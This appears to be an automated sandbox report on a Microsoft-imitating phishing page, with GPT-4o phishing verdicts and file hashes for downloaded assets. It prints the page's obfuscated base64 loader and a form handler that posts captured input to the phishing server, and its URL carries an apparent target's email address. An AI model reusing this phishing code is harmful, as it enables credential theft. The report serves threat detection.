                                                document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPmhZdU96YVdWbTA8L3RpdGxlPg0KICAgIDxzdHlsZT4NCmJvZHkgew0KICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICBoZWlnaHQ6IDEwMCU7DQogIG92ZXJmbG93OiBoaWRkZW47DQp9DQojanZhR251U3djdyBoNHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbTouNXJlbTtmb250LXdlaWdodDo1MDA7bGluZS1oZWlnaHQ6MS4yO30NCiNqdmFHbnVTd2N3IGg0e2ZvbnQtc2l6ZTpjYWxjKDEuMyk7fQ0KQG1lZGlhIChtaW4td2lkdGg6MTIwMHB4KXsNCiNqdmFHbnVTd2N3IGg0e2ZvbnQtc2l6ZToxLjVyZW07fQ0KfQ0KI2p2YUdudVN3Y3cgcHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbToxcmVtO30NCiNqdmFHbnVTd2N3LmNvbnRhaW5lcnt3aWR0aDogMTAwJTtwYWRkaW5nLXJpZ2h0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTtwYWRkaW5nLWxlZnQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO21hcmdpbi1yaWdodDogYXV0bzttYXJnaW4tbGVmdDogYXV0bzt9DQojanZhR251U3djdyAudGV4dC1jZW50ZXIge3RleHQtYWxpZ246IGNlbnRlciFpbXBvcnRhbnQ7fQ0KQG1lZGlhIChtaW4td2lkdGg6OTkycHgpew0KI2p2YUdudVN3Y3cgLmNvbC1sZy00e2ZsZXg6MCAwIGF1dG87d2lkdGg6MzMuMzMzMzMzMzMlO30NCn0NCiNqdmFHbnVTd2N3IC5kaXNwbGF5LTQge2ZvbnQtc2l6ZTogMS4yNXJlbSFpbXBvcnRhbnQ7fQ0KI2p2YUdudVN3Y3cgLm10LTIge21hcmdpbi10b3A6IDAuNXJlbSFpbXBvcnRhbnQ7fQ0KI2p2YUdudVN3Y3cgLmg0IHtmb250LXNpemU6IGNhbGMoLjkwMHJlbSArIC4zdncpO30NCiNqdmFHbnVTd2N3IC5qdXN0aWZ5LWNvbnRlbnQtY2VudGVye2p1c3RpZnktY29udGVudDpjZW50ZXIhaW1wb3J0YW50O30NCiNqdmFHbnVTd2N3Lm10LTV7bWFyZ2luLXRvcDozcmVtIWltcG9ydGFudDt9DQojanZhR251U3djdyAubXQtNCB7bWFyZ2luLXRvcDogMXJlbSFpbXBvcnRhbnQ7fQ0KI2p2YUdudVN3Y3cgI2FPeWtibnpTWVEge2ZvbnQtc2l6ZToxM3B4O30NCiAgICA8L3N0eWxlPg0KICAgIDxzY3JpcHQ+DQogICAgLy8gc2V0SW50ZXJ2YWwoKCkgPT4gew0KICAgIC8vIGNvbnN0IHQwID0gRGF0ZS5ub3coKTsNCiAgICAvLyBldmFsKCdkZWJ1Z2dlcicpOw0KICAgIC8vIGNvbnN0IHQxID0gRGF0ZS5ub3coKTsNCiAgICAvLyB9LCAxMDAwKTsNCiAgICA8L3NjcmlwdD4NCjwvaGVhZD4NCg0KPGJvZHkgc3R5bGU9ImZvbnQtZmFtaWx5OiBhcmlhbCwgc2Fucy1zZXJpZjtiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmO2NvbG9yOiAjMDAwO3BhZGRpbmc6IDIwcHg7Zm9udC1zaXplOiAxOHB4O292ZXJzY3JvbGwtYmVoYXZpb3I6IGNvbnRhaW47Ij4NCjxkaXYgaWQ9Imp2YUdudVN3Y3ciIGNsYXNzPSJjb250YWluZXIiPg0KPGRpdiBpZD0iWmtyR1BOeGNmYiIgY2xhc3M9InJvdyBqdXN0aWZ5LWNvbnRlbnQtY2VudGVyIj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIj4NCjxmb3JtIGlkPSJzYlJhY3dtUUdxIj4NCjxkaXYgY2xhc3M9ImNmX3R1cm5zdGlsZSIgaWQ9ImNmIj48L2Rpdj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJwYWdlbGluayIgbmFtZT0icGFnZWxpbmsiIHZhbHVlPSIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRpcCIgbmFtZT0iYmx0ZGlwIiB2YWx1ZT0iOC40Ni4xMjMuMTc1Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iaHR0cHM6Ly9kZWJzc2llYmVhZHMuY28ua2UvIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpI
                                                URL: https://f8gxf.oritelos.ru/hIzc6w/#Dian.hancock@baesystems.com Model: gpt-4o
                                                ```json
                                                {
                                                  "riskscore": 3,
                                                  "reasons": "The provided JavaScript code includes a form submission handler that prevents the default form submission and sends the form data to a relative URL using the Fetch API. The code also handles the response by reloading the page on success or redirecting to a specific URL on error. While these behaviors are not inherently malicious, the use of obfuscated variable names and the redirection to a potentially suspicious URL could be indicative of phishing or other malicious activities. However, without more context or additional evidence, the risk remains moderate."
                                                }
                                                turnstile.render('#cf', {
                                                        sitekey: '0x4AAAAAAAbKSXjZm5zNeGX0',
                                                        'error-callback': hEfMvrsVkx,
                                                        callback: oYOlzeAGzt,
                                                    });
                                                    function hEfMvrsVkx() {
                                                        turnstile.reset();
                                                    }
                                                    function oYOlzeAGzt() {
                                                        var ayDZGBCCYi = document.getElementById("sbRacwmQGq");
                                                        ayDZGBCCYi.onsubmit = function (event) {
                                                            event.preventDefault();
                                                        };
                                                        document.getElementById("pagelink").value = 'ayfujude';
                                                        var ptjMMqFrhK = "../pbGQlY127p6h0ts0giGGM6xrw";
                                                        fetch(ptjMMqFrhK, {
                                                            method: "POST",
                                                            body: new FormData(ayDZGBCCYi)
                                                        }).then(response => {
                                                            return response.json();
                                                        }).then(data => {
                                                            if(data['status'] == 'success'){
                                                            location.reload();
                                                            }
                                                            if(data['status'] == 'error'){
                                                            window.location.href = '/adnniniznzbueggomL5blcLbZnycxUEvazrtjubquqh?fnxfdsEQLVSCIYQJPLJXKCUFDQVJRERCYZuhffhyksyhnzgntzfwciptpeuak';
                                                            }
                                                        });
                                                    }
                                                URL: https://f8gxf.oritelos.ru Model: gpt-4o
                                                ```json
                                                {
                                                  "phishing_score": 9,
                                                  "brands": "Microsoft",
                                                  "phishing": true,
                                                  "suspicious_domain": true,
                                                  "has_loginform": true,
                                                  "has_captcha": false,
                                                  "setechniques": true,
                                                  "legitmate_domain": "microsoft.com",
                                                  "reasons": "The URL 'https://f8gxf.oritelos.ru' does not match the legitimate domain 'microsoft.com'. The page mimics a Microsoft login page, which is a common tactic in phishing attacks. The domain name is suspicious and not associated with Microsoft. The presence of a login form on a suspicious domain further indicates phishing."
                                                }
                                                URL: https://f8gxf.oritelos.ru Model: gpt-4o
                                                ```json
                                                {
                                                  "phishing_score": 9,
                                                  "brands": "Microsoft",
                                                  "phishing": true,
                                                  "suspicious_domain": true,
                                                  "has_loginform": true,
                                                  "has_captcha": false,
                                                  "setechniques": true,
                                                  "legitmate_domain": "microsoft.com",
                                                  "reasons": "The URL 'https://f8gxf.oritelos.ru' is highly suspicious as it does not match the legitimate domain 'microsoft.com' associated with Microsoft. The page mimics the Microsoft login page, which is a common social engineering technique used in phishing attacks. The presence of a login form on a suspicious domain further indicates a high risk of phishing."
                                                }
                                                No context
                                                No context
                                                No context
                                                No context
                                                No context
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):727
                                                Entropy (8bit):7.573165690842521
                                                Encrypted:false
                                                SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                Category:downloaded
                                                Size (bytes):93276
                                                Entropy (8bit):7.997636438159837
                                                Encrypted:true
                                                SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/efoHxPf1tkQQJ2bQoGNe78ItFgVg4zXAkl97
                                                Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (23398), with no line terminators
                                                Category:downloaded
                                                Size (bytes):23398
                                                Entropy (8bit):5.104409455331282
                                                Encrypted:false
                                                SSDEEP:384:ztafGtz2omXX44PL5Ky0sdY8xbXnb4YEb0tkBSgfn:hafSz2omXX44PL5Ky0sdY8xbXnEYw0sz
                                                MD5:C1C51D30D5E7094136F2D828349E520F
                                                SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/12XCRnloHGipczcdhoCq68920
                                                Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):1864
                                                Entropy (8bit):5.222032823730197
                                                Encrypted:false
                                                SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                MD5:BC3D32A696895F78C19DF6C717586A5D
                                                SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                Malicious:false
                                                Reputation:low
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1400
                                                Entropy (8bit):7.808470583085035
                                                Encrypted:false
                                                SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                MD5:333EE830E5AB72C41DD9126A27B4D878
                                                SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                Category:downloaded
                                                Size (bytes):28000
                                                Entropy (8bit):7.99335735457429
                                                Encrypted:true
                                                SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/pqOKTFEEmnh8egHBG34r6Zuv40
                                                Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                Category:downloaded
                                                Size (bytes):36696
                                                Entropy (8bit):7.988666025644622
                                                Encrypted:false
                                                SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/23rACQ3TWSEp90OaR5XE1xy67
                                                Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (1238)
                                                Category:downloaded
                                                Size (bytes):1239
                                                Entropy (8bit):5.068464054671174
                                                Encrypted:false
                                                SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):268
                                                Entropy (8bit):5.111190711619041
                                                Encrypted:false
                                                SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                MD5:59759B80E24A89C8CD029B14700E646D
                                                SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (309), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):51451
                                                Entropy (8bit):4.883095768609534
                                                Encrypted:false
                                                SSDEEP:768:zx+ls/s39vm/I8Goo4mgCuusqCVuitgRTHC4E/mMx4C8wDp:avvm/I8G74ksqCUMgRTHC4EeMx4+p
                                                MD5:96A7EE0F69F3EBA2613AB6AED7557177
                                                SHA1:9D60C46037E28E0A4415CD4E4B1F8BF681B5A354
                                                SHA-256:36FCCAF8F863E17CE147D7A54764048237913214F9C4A7C8113206828960F4AC
                                                SHA-512:52E38898D15C195EC776160995E12A0EF8EC9BCD0DC4FE46AFD235E8C67E2107558377FAD604EF66FEA77C80B726A1EBF49A3D9BC067F2F1E20C18E2DAA2AB1F
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>.. <script src="https://cdn.socket.io/4.6.0/socket.io.min.js"></script>.. <script src="https://www.google.com/recaptcha/api.js"></script>.. <link rel="stylesheet" href="/12XCRnloHGipczcdhoCq68920">.. <link rel="stylesheet" href="/abD8xmKpqXe3def25">.. <link rel="preload" href="pqOKTFEEmnh8egHBG34r6Zuv40" as="font" type="font/woff2" crossorigin="anonymous">.. <link rel="preload" href="yzSSueW3Rlb568gKDHxKxop43" as="font" type="font/woff" crossorigin="anonymous">.. <link rel="preload" href="78cJa7D3fK45ClNib8mst60" as="font" type="font/woff2" crossorigin="anonymous">.. <link rel="preload" href="23rACQ3TWSEp90OaR5XE1xy67" as="font" type="font/woff" crossorigin="anonymous">.. <link rel="preload" href="89Lx2AXVud2xlUwbPNlje12zdhl4A2IPyz79" as="font" type="font/woff2" crossorigin="anonymous">.. <link rel="preload" href="efoHxPf1tkQQJ2bQoGNe78ItFgVg4z
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):270
                                                Entropy (8bit):4.840496990713235
                                                Encrypted:false
                                                SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                MD5:40EB39126300B56BF66C20EE75B54093
                                                SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                Malicious:false
                                                Reputation:low
